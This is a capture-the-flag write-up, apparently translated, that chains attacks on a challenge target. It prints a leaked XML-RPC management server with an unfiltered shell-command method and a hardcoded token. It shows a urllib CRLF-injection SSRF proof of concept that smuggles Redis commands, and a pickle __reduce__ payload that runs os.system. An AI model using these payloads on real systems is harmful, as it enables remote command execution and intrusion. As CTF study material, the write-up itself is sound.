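    demo = b"python3\x00/path/to/mcp_server_secure_EXAMPLE.py\x00"
    print(cmdline_url(1), find_script(demo))
```

Once the script path is known, the same SSRF read against that path returns the server source.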

#!/usr/bin/env python3
import sys
import os
import subprocess
import json
import platform
import threading
import time
import functools
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from xmlrpc.server import SimpleXMLRPCDispatcher
import logging

# 设置日志
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger('MCP-Secure-Server')

class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)

class SecureXMLRPCServer(SimpleXMLRPCServer):

def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._introspection_enabled = False

def system_listMethods(self):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def system_methodSignature(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def system_methodHelp(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def _dispatch(self, method, params):
if method.startswith('system.'):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

try:
return super()._dispatch(method, params)
except Fault as e:
raise Fault(403, "Authentication failed")
except Exception:
raise

class MCPServerSecure:

def __init__(self, host='0.0.0.0', port=54321):
self.host = host
self.port = port
self.server = SecureXMLRPCServer((host, port),
requestHandler=RequestHandler,
allow_none=True,
logRequests=False)

self.auth_token = "mcp_secure_token_b2rglxd"

self.register_methods()

logger.info(f"安全MCP服务器初始化完成,监听 {host}:{port}")
logger.info(f"认证令牌: {self.auth_token}")
logger.info(f"服务启动完成,进程ID: {os.getpid()}")

def verify_token(self, token):
"""验证令牌"""
return token == self.auth_token

def _auth_required(self, func):
"""认证装饰器"""
@functools.wraps(func)
def wrapper(token, *args, **kwargs):
if not self.verify_token(token):
return {'error': 'Authentication failed. Invalid token.'}
return func(*args, **kwargs)
return wrapper

def register_methods(self):
"""注册所有需要认证的RPC方法"""
# 所有方法都要求token作为第一个参数
self.server.register_function(
self._auth_required(self.get_server_info),
'get_server_info'
)
self.server.register_function(
self._auth_required(self.get_system_status),
'get_system_status'
)
self.server.register_function(
self._auth_required(self.list_files),
'list_files'
)
self.server.register_function(
self._auth_required(self.read_file),
'read_file'
)
self.server.register_function(
self._auth_required(self.execute_command),
'execute_command'
)
self.server.register_function(
self._auth_required(self.get_process_list),
'get_process_list'
)
self.server.register_function(
self._auth_required(self.service_control),
'service_control'
)

# ========== MCP 服务方法 ==========
def get_server_info(self):
"""获取MCP服务器信息"""
return {
'service': 'Secure Management Control Protocol Server',
'version': '2.0.0',
'host': self.host,
'port': self.port,
'elevated_privileges': os.geteuid() == 0,
'pid': os.getpid(),
'secure': True,
'auth_required': 'ALL_METHODS'
}

def get_system_status(self):
"""获取系统状态信息"""
try:
# CPU使用率
with open('/proc/loadavg', 'r') as f:
loadavg = f.read().strip()

# 内存信息
mem_info = {}
with open('/proc/meminfo', 'r') as f:
for line in f:
if 'MemTotal' in line or 'MemFree' in line or 'MemAvailable' in line:
key, value = line.split(':')
mem_info[key.strip()] = value.strip()

# 磁盘空间
disk_info = {}
try:
df_output = subprocess.check_output(['df', '-h', '/'],
stderr=subprocess.DEVNULL,
text=True)
lines = df_output.strip().split('\n')
if len(lines) > 1:
parts = lines[1].split()
if len(parts) >= 6:
disk_info = {
'filesystem': parts[0],
'size': parts[1],
'used': parts[2],
'available': parts[3],
'use_percent': parts[4],
'mounted': parts[5]
}
except:
disk_info = {'error': 'Unable to get disk info'}

return {
'system': platform.system(),
'node': platform.node(),
'release': platform.release(),
'version': platform.version(),
'machine': platform.machine(),
'processor': platform.processor(),
'load_average': loadavg,
'memory': mem_info,
'disk': disk_info,
'uptime': self._get_uptime(),
'time': time.strftime('%Y-%m-%d %H:%M:%S')
}
except Exception as e:
return {'error': str(e)}

def _get_uptime(self):
"""获取系统运行时间"""
try:
with open('/proc/uptime', 'r') as f:
uptime_seconds = float(f.readline().split()[0])
days = int(uptime_seconds // 86400)
hours = int((uptime_seconds % 86400) // 3600)
minutes = int((uptime_seconds % 3600) // 60)
return f"{days}d {hours}h {minutes}m"
except:
return "Unknown"

    def list_files(self, path='.'):
        """List the files and directories under the given directory."""
        try:
            if '..' in path or path.startswith('/'):
                sensitive_dirs = ['/etc', '/root', '/home', '/var']
                for sensitive in sensitive_dirs:
                    if path.startswith(sensitive) and not path.startswith('/opt/mcp_service'):
                        return {'error': 'Access to sensitive directory restricted'}

            files = []
            for item in os.listdir(path):
                item_path = os.path.join(path, item)
                stat = os.stat(item_path)
                files.append({
                    'name': item,
                    'path': item_path,
                    'is_dir': os.path.isdir(item_path),
                    'size': stat.st_size,
                    'modified': time.ctime(stat.st_mtime),
                    'permissions': oct(stat.st_mode)[-3:]
                })
            return {'path': path, 'files': files}
        except Exception as e:
            return {'error': str(e)}

    def read_file(self, filepath):
        """Read the contents of a file."""
        try:
            if '..' in filepath or filepath.startswith('/etc/passwd') or 'flag' in filepath:
                return {'error': 'Access to sensitive file restricted'}

            with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read(5000)  # cap the read size
            return {
                'file': filepath,
                'content': content,
                'truncated': len(content) == 5000
            }
        except Exception as e:
            return {'error': str(e)}

    def execute_command(self, command):
        """Execute a system command."""
        try:
            logger.warning(f"Executing command: {command}")

            result = subprocess.run(
                command,
                shell=True,
                capture_output=True,
                text=True,
                timeout=10
            )

            return {
                'command': command,
                'returncode': result.returncode,
                'stdout': result.stdout,
                'stderr': result.stderr,
                'success': result.returncode == 0
            }
        except subprocess.TimeoutExpired:
            return {'error': 'Command execution timeout'}
        except Exception as e:
            return {'error': str(e)}

    def get_process_list(self):
        """Return the process list."""
        try:
            processes = []
            # Use the ps command to collect process information
            ps_output = subprocess.check_output(
                ['ps', 'aux'],
                stderr=subprocess.DEVNULL,
                text=True
            )

            lines = ps_output.strip().split('\n')
            if len(lines) > 1:
                header = lines[0]
                for line in lines[1:21]:  # return at most the first 20 processes
                    parts = line.split()
                    if len(parts) >= 11:
                        process = {
                            'user': parts[0],
                            'pid': parts[1],
                            'cpu': parts[2],
                            'mem': parts[3],
                            'vsz': parts[4],
                            'rss': parts[5],
                            'tty': parts[6],
                            'stat': parts[7],
                            'start': parts[8],
                            'time': parts[9],
                            'command': ' '.join(parts[10:])
                        }
                        processes.append(process)

            return {'process_count': len(processes), 'processes': processes}
        except Exception as e:
            return {'error': str(e)}

    def service_control(self, service_name, action):
        """Control a system service (start/stop/restart/status)."""
        try:
            if action not in ['start', 'stop', 'restart', 'status']:
                return {'error': 'Invalid action. Use start/stop/restart/status'}

            result = subprocess.run(
                ['systemctl', action, service_name],
                capture_output=True,
                text=True,
                timeout=10
            )

            return {
                'service': service_name,
                'action': action,
                'returncode': result.returncode,
                'stdout': result.stdout,
                'stderr': result.stderr
            }
        except FileNotFoundError:
            return {'error': 'systemctl not available'}
        except Exception as e:
            return {'error': str(e)}

    def run(self):
        """Run the MCP server."""
        logger.info(f"Starting secure MCP server, listening on {self.host}:{self.port}")
        logger.info("All methods require an auth token")
        try:
            self.server.serve_forever()
        except KeyboardInterrupt:
            logger.info("Interrupt received, shutting down server")
        finally:
            self.server.server_close()
            logger.info("MCP server stopped")

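def main():
    """Entry point."""
    # Check the privileges the service runs with
    if os.geteuid() != 0:
        logger.warning("Warning: service is not running with administrator privileges; some features may be limited")
        logger.warning("Running with administrator privileges is recommended for full functionality")

    # Create and run the server
    server = MCPServerSecure(host='0.0.0.0', port=54321)
    server.run()

if __name__ == '__main__':
    main()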
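
Among the methods above, read_file rejects any path containing "flag", while execute_command hands its argument to a shell with no filtering, which fits the plan of reading the flag through command execution. A minimal sketch that copies only the path check from read_file; the name read_file_blocked and the path /flag are assumptions for illustration, not part of the challenge:

```python
def read_file_blocked(filepath: str) -> bool:
    """Copy of the path check at the top of read_file in the listing above."""
    return (
        '..' in filepath
        or filepath.startswith('/etc/passwd')
        or 'flag' in filepath
    )


# '/flag' is a hypothetical flag location used only for illustration.
for candidate in ('/flag', '/tmp/../flag', '/etc/hostname'):
    verdict = 'blocked' if read_file_blocked(candidate) else 'allowed'
    print(candidate, '->', verdict)
```

Since execute_command has no such check, a command like `cat` on the same path would not be filtered by the server code shown here.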

SSRF

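A search showed that this version of urllib is vulnerable to CRLF injection (CVE-2019-9740); here is the link to the GitHub issue.

Quoting the original report: Attack Scenarios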

  1. By crafting HTTP headers, it’s possible to fool some web services;
  2. It’s also possible to attack several simple services like Redis, memcached.

Let’s take Redis as a example here:

Adapt the script above to this:

#!/usr/bin/env python3
import sys
import urllib
import urllib.error
import urllib.request

host = "10.251.0.83:6379?\r\nSET test success\r\n"
url = "http://" + host + ":8080/test/?test=a"
try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)
#end

We changed the injected header to a valid redis command, after executing this, we check the redis server:

127.0.0.1:6379> GET test
"success"
127.0.0.1:6379>

We can see that a “test” key was inserted successfully.

That is the whole principle, but getting every one of these \r\n sequences exactly right was really, really painful.
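
To make the \r\n bookkeeping less error-prone, the URL can be assembled by a small helper. This is a minimal sketch that follows the shape of the quoted proof of concept; the helper name build_crlf_url, the password, and the key are hypothetical, since the real values are not shown in this write-up. It only builds and prints the string, because patched Python versions reject URLs that contain control characters.

```python
from typing import Sequence


def build_crlf_url(redis_host: str, redis_port: int, commands: Sequence[str]) -> str:
    """Build a URL whose host part smuggles inline Redis commands via CRLF.

    Same layout as the quoted proof of concept:
    "<host>:<port>?" + "\\r\\n<command>" per command + "\\r\\n" + dummy port and path.
    """
    injected = "".join(f"\r\n{command}" for command in commands) + "\r\n"
    return f"http://{redis_host}:{redis_port}?{injected}:8080/test/?test=a"


# Hypothetical password and key, for illustration only.
url = build_crlf_url(
    "127.0.0.1",
    6379,
    ["AUTH hypothetical_password", "SET test success"],
)
print(repr(url))
```

Printing with repr() keeps the control characters visible as \r\n, which makes it easier to check that each command starts on its own line.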

Pickle

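I panicked, and of course I did, since time was running out. The challenge imposes restrictions, so the payload has to start from OnlineUser. It really is basic, but by then I could no longer calm down and think ().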

OnlineUser.__init__.__globals__["os"].system("ls")
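
The expression works because every Python function keeps a reference to the global namespace of the module it was defined in, so anything that module imported is reachable through `__globals__`. A small sketch of that lookup, using a standard-library function as a stand-in because OnlineUser lives in the challenge's app.py; the helper name module_from_function is hypothetical:

```python
import os
import subprocess


def module_from_function(func, name: str):
    """Return the object bound to `name` in the module globals of `func`."""
    return func.__globals__[name]


# subprocess.py imports os at module level, so its functions can reach it.
reached = module_from_function(subprocess.Popen.__init__, "os")
print(reached is os)
```

The same lookup on OnlineUser.__init__ only succeeds if the module that defines OnlineUser has imported os.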

Reproducing it after the contest was easy. From there, all that is left is to send a request to the MCP server.

import datetime
import os
import pickle

from flask import request


class OnlineUser:
    """Online-user class that stores login state."""

    def __init__(self, username, role="user"):
        self.username = username
        self.role = role
        self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        # Expire one hour after login
        expiry = datetime.datetime.now() + datetime.timedelta(hours=1)
        self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S")
        self.ip_address = request.remote_addr if request else "unknown"

    def __repr__(self):
        return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"

    def __reduce__(self):
        # Evaluated while dumping, so the stream stores the resolved os.system (see the output below)
        return (OnlineUser.__init__.__globals__["os"].system, ("say 你妈",))


if __name__ == "__main__":
    payload = pickle.dumps(OnlineUser("aaa"), protocol=0)
    print(payload)
    # b'cposix\nsystem\np0\n(Vsay \\u4f60\\u5988\np1\ntp2\nRp3\n.'
    pickle.loads(payload)
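
For the last step, requesting the MCP server, the XML-RPC request body can be produced with the standard library. This is only a sketch under assumptions: the token value, the flag path, and passing the token as the first parameter are all hypothetical, because how the server expects the token is not shown in this section. The body would then be sent as an HTTP POST to the port from main() (54321).

```python
import xmlrpc.client

# Hypothetical values: the real token and the way it is passed are assumptions.
AUTH_TOKEN = "hypothetical_token"
COMMAND = "cat /flag"  # assumed flag path


def build_mcp_call(method: str, *params) -> str:
    """Serialize an XML-RPC method call into its XML request body."""
    return xmlrpc.client.dumps(params, methodname=method)


body = build_mcp_call("execute_command", AUTH_TOKEN, COMMAND)
print(body)

# Round-trip check: loads() returns (params, methodname).
decoded_params, decoded_method = xmlrpc.client.loads(body)
```

Building the body as a plain string, rather than using ServerProxy, keeps it usable from inside a command executed through the pickle payload, for example by piping it to an HTTP client.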

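Afterword

The damn platform shuts the target machine down the moment time is up. By then, holding on until the last minute had long stopped being about the flag (I probably was not going to get it anyway). Then I refreshed the page and was told the target was gone? A very bad experience that wasted a lot of time; what I learned was not proportional to the time I put in.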